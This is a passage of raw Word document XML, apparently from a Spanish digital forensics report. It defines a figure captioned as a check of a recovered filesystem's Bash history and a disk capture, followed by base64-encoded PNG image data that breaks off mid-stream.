                <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="39753315" name="Grupo 46"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5441950" cy="1828800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5442404" cy="1828800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="100669384" name="Imagen 73"/>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5440680" cy="1384300"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="365637779" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="53159" y="1413510"/>
                            <a:ext cx="5389245" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3F81CDD9" w14:textId="19D4D1C6" w:rsidR="00915A6C" w:rsidRPr="00481B45" w:rsidRDefault="00915A6C" w:rsidP="00915A6C">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>47</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="119" w:name="_Toc155782614"/>
                              <w:r w:rsidRPr="00B56EE2">
                                <w:t>Comprobación del archivo Bash history del recover filesystem y de la captura del disco duro.</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747505" id="Grupo 46" o:spid="_x0000_s1178" style="position:absolute;left:0;text-align:left;margin-left:377.3pt;margin-top:168.35pt;width:428.5pt;height:2in;z-index:251791360;mso-position-horizontal:right;mso-position-horizontal-relative:margin" coordsize="54424,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&#10;mLMP9vb2fDX9iIgYYS3Vr6oe8tVhD